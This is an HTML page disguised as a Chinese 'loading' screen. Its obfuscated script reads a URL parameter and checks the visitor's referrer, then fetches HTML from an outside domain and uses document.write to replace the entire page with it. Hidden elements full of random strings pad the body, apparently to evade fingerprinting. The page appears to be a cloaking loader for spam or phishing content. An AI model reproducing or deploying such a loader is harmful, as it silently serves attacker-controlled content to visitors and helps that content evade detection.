<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .nqfbpVI65Q {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .nqfbpVI65Q .yLzOSm9j {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .nqfbpVI65Q .content {
            line-height: 50px;
            text-align: center
        }

        .nqfbpVI65Q .img {
            width: 100%
        }

        .nqfbpVI65Q .YRJEBcPx {
            text-align: center
        }

        .nqfbpVI65Q .YRJEBcPx span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .nqfbpVI65Q .YRJEBcPx span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .nqfbpVI65Q .YRJEBcPx span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .nqfbpVI65Q .YRJEBcPx span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .nqfbpVI65Q .YRJEBcPx span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .nqfbpVI65Q .YRJEBcPx span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .nqfbpVI65Q .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function y1JWvjcBZnhDk(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ZVPIPi9 = y1JWvjcBZnhDk('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ZVPIPi9 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ZVPIPi9 +".html?a=share";
		}
		
        mD7Cj9=url+"#"+new Date().getTime();
        mD7Cj9 && function() {
            $.get(mD7Cj9, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<p  style='display:none'>SWcxIe4wLel2NMqiV5tuVpiWTW32LsiuUZY8D7wTCIrOiAPYnbcnZXy</p>
<ul style='display:none' >zai0nIb5zMPSgT6ebDGIadBRf8N3z8hkvCjVG13TFLK8EypMdmdHGt9j4w7kIHDhf4f54m4Q8ir9QnaWQV2uj6LAMs</ul>
<span style='display:none'>LmxNVTsfbiFAEp8uDtNcfYv8b5</span><div class="nqfbpVI65Q">
    <div class="yLzOSm9j">
        <div class="YRJEBcPx">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >xhAux7WfJmyM0UYMO1D1IAn</li>
<b style='display:none' >XkxRYhYOwqGDyTHl42fYlEsW1jUgfKxMzSVpLq5uqSvlxJu6De3nBk8uY</b>
<ul style='display:none' >Eni8z9RIzNDm00jroEMKWD1DbALAbCHEecw</ul></body>
</html>